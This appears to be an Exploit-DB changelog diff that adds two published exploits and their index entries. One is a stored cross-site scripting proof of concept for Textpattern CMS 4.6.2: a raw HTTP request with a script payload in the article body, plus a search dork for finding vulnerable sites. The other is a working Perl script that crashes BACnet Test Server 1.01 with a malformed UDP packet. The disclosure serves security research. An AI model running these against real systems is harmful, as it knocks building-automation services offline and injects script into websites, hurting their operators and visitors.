DB: 2020-10-08

2 changes to exploits/shellcodes

BACnet Test Server 1.01 - Remote Denial of Service (PoC)

Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting

exploits/php/webapps/48861.txt

@@ -0,0 +1,51 @@
+# Exploit Title: Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting
+# Exploit Author: Alperen Ergel
+# Web Site: https://alperenae.gitbook.io/
+# Software Homepage: https://textpattern.com/
+# Version : 4.6.2
+# Tested on: windows 10 / xammp
+# Category: WebApp
+# Google Dork: intext:"Published with Textpattern CMS"
+# Date: 2020-10-29
+# CVE :-
+######## Description ########
+#
+# 1-) Loggin administrator page
+# 
+# 2-) Write new blog add payload to 'body'
+#
+# 3-) Back to web site then will be work payload
+#
+#
+######## Proof of Concept ########
+
+========>>> REQUEST <<<=========
+
+POST /textpattern/textpattern/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://localhost/textpattern/textpattern/index.php?event=article&ID=3
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------127132438115577379281797109093
+Content-Length: 6080
+Connection: close
+Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40; __atuvs=5f77129c504c17ce000
+
+### SNIPPP HERE ####
+
+-----------------------------127132438115577379281797109093
+Content-Disposition: form-data; name="Title"
+
+XSS
+-----------------------------127132438115577379281797109093
+Content-Disposition: form-data; name="textile_body"
+
+1
+-----------------------------127132438115577379281797109093
+Content-Disposition: form-data; name="Body"
+
+<script>alert(1)</script>
+-----------------------------127132438115577379281797109093

exploits/windows/dos/48860.txt

@@ -0,0 +1,113 @@
+# Title: BACnet Test Server 1.01 - Remote Denial of Service (PoC)
+# Date: 2020-10-07
+# Author: LiquidWorm
+# Vendor: https://www.bac-test.com
+# Product link: https://sourceforge.com/projects/bacnetserver
+# CVE: N/A
+
+
+#!/usr/bin/perl
+#
+# BACnet Test Server 1.01 Remote Denial of Service Exploit
+#
+# 
+# Vendor: BACnet Interoperability Test Services, Inc.
+# Product web page: https://www.bac-test.com
+#                   https://sourceforge.com/projects/bacnetserver
+# Affected version: 1.01 (BACnet Stack Version 0.5.7)
+#
+# Summary: This is a simple BACnet Server aimed at developers who
+# want to explore or test their BACnet Client implementations of
+# the ASHRAE BACnet protocol. It is based on Steve Karg's fine
+# implementation of the BACnet Stack.
+#
+# Desc: The BACNet Test Server is vulnerable to a denial of service
+# (DoS) vulnerability when sending malformed BVLC Length UDP packet
+# to port 47808 causing the application to crash.
+#
+# Type - 0x81
+# BVLC Function
+# - 0x01 - Write Broadcast Distribution Table
+# - 0x02 - Read Broadcast Distribution Table
+# - 0x03 - Read Broadcast Distribution Table ACK
+# - 0x04 - Forwarded NPDU with optional Originating Device IP address and Port included in BVLL header
+# - 0x05 - Register Foreign Device with expiration timeout (Time-to-live) in seconds
+# - 0x0a - Original-Unicast-NPDU used to send directed NPDUs to another BACnet/IP device or router.
+#   Optional Originating Device IP address and Port NOT included in BVLL header.
+# - 0x0b - Original-Broadcast-NPDU used by devices (except foreign devices) to broadcast messages on B/IP networks.
+# - 0x0c - Secure-BVLL
+# - BVLL Length
+# - IP address of Originating Device - optional depending on BVLC Function Code
+# - Port number of Originating Device - optional depending on BVLC Function Code
+# - NPDU - Network Layer Protocol Data Unit
+#
+# =================================================================
+# (67c.2f34): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\BACnet Interoperability Testing Services, Inc\BACnet Server\Server.exe
+# eax=00600000 ebx=00692000 ecx=009bd796 edx=005fee00 esi=005fec04 edi=005fed00
+# eip=00994313 esp=005fec04 ebp=005fed00 iopl=0         nv up ei pl nz ac pe nc
+# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
+# Server+0x34313:
+# 00994313 8810            mov     byte ptr [eax],dl          ds:002b:00600000=?? 
+# 0:000> d 994313 +77
+# 0099438a cccccccc
+# 0099438e cccccccc
+# 00994392 cccccccc
+# 00994396 cccccccc
+# 0099439a cccccccc
+# 0:000> d esp
+# 005fec04 005ff3f8
+# 005fec08 005ff408
+# 005fec0c 00692000
+# 005fec10 cccccccc
+# 005fec14 cccccccc
+# 004fec18 cccccccc
+# =================================================================
+#
+# Tested on: Microsoft Windows 10 Professional (EN)
+#            Microsoft Windows 7 Professional SP1 (EN)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2020-5597
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5597.php
+#
+#
+# 05.08.2019
+#
+
+use strict;
+use warnings;
+use IO::Socket::INET;
+
+my $target = "10.0.99.34";
+my $porta = 47808;
+my $proto = "udp";
+my $stype = SOCK_DGRAM;
+my $timeout = 1;
+
+my $socket = new IO::Socket::INET (
+PeerHost => $target,
+PeerPort => $porta,
+Proto => $proto,
+Type => $stype,
+Timeout => $timeout
+) or die "Socket error. : $!\n";
+
+print "Connected to: $target:$porta\n";
+
+$| = 1;
+binmode $socket;
+
+my $data = "\x81\x09\xFF\xFE";
+
+print "Sending: $data [ ".length($data)." bytes ]\n";
+send ($socket, $data, 0) or die "Nope: $!\n";
+print "Done.\n";
+
+$socket->close();

files_exploits.csv

@@ -5792,6 +5792,7 @@ id,file,description,date,author,type,platform,port
 42781,exploits/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",dos,multiple,
 42782,exploits/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",dos,multiple,
 42783,exploits/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",dos,multiple,
+48860,exploits/windows/dos/48860.txt,"BACnet Test Server 1.01 - Remote Denial of Service (PoC)",2020-10-07,LiquidWorm,dos,windows,
 42917,exploits/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",dos,windows,
 42920,exploits/windows/dos/42920.py,"Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption",2017-09-29,hyp3rlinx,dos,windows,
 42932,exploits/linux/dos/42932.c,"Linux Kernel < 4.14.rc3 - Local Denial of Service",2017-10-02,"Wang Chenyu",dos,linux,
@@ -40678,6 +40679,7 @@ id,file,description,date,author,type,platform,port
 48852,exploits/php/webapps/48852.txt,"Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting",2020-10-01,"Alperen Ergel",webapps,php,
 48857,exploits/hardware/webapps/48857.txt,"Karel IP Phone IP1211 Web Management Panel - Directory Traversal",2020-10-06,"berat isler",webapps,hardware,
 48858,exploits/json/webapps/48858.txt,"EasyPMS 1.0.0 - Authentication Bypass",2020-10-06,Jok3r,webapps,json,
+48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,